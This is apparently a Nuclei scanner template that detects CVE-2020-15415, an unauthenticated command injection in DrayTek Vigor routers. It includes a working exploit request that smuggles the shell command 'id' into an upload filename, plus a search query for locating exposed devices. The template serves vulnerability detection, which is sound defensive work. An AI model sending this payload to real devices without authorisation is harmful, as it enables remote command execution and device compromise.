id: CVE-2020-15415 info: name: DrayTek Vigor - Command Injection author: ritikchaddha severity: critical description: | DrayTek Vigor devices contain a command injection vulnerability in the cvmcfgupload functionality. The vulnerability allows remote attackers to execute arbitrary commands through specially crafted requests to the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint. impact: | Unauthenticated attackers can execute arbitrary system commands on DrayTek Vigor devices via the cvmcfgupload endpoint, leading to complete device compromise and potential network infiltration. remediation: | Update the firmware to the latest version provided by DrayTek. If no update is available, consider implementing network segmentation to restrict access to the device's management interface. reference: - https://github.com/CLP-team/Vigor-Commond-Injection - https://nvd.nist.gov/vuln/detail/CVE-2020-15415 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15415 cwe-id: CWE-78 epss-score: 0.93003 epss-percentile: 0.99789 cpe: cpe:2.3:h:draytek:vigor:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: draytek product: vigor fofa-query: '"excanvas.js" && "lang == \"zh-cn\"" && "detectLang" && server=="DWS"' tags: cve,cve2020,draytek,rce,router,kev,vkev,vuln http: - raw: - | POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary ------WebKitFormBoundary Content-Disposition: form-data; name="abc"; filename="t';id;echo '1_" Content-Type: text/x-python-script ------WebKitFormBoundary-- matchers: - type: dsl dsl: - regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body) - contains(header, 'DWS') - status_code == 200 condition: and # digest: 4a0a00473045022034b268599847cf7e819172d6300268075154b88736f8b1f640f802472f68005d022100e4300251b1c853a3e11bb0e40b9afd314538565d38f4934b03a1338613c0d258:922c64590222798bb761d5b6d8e72950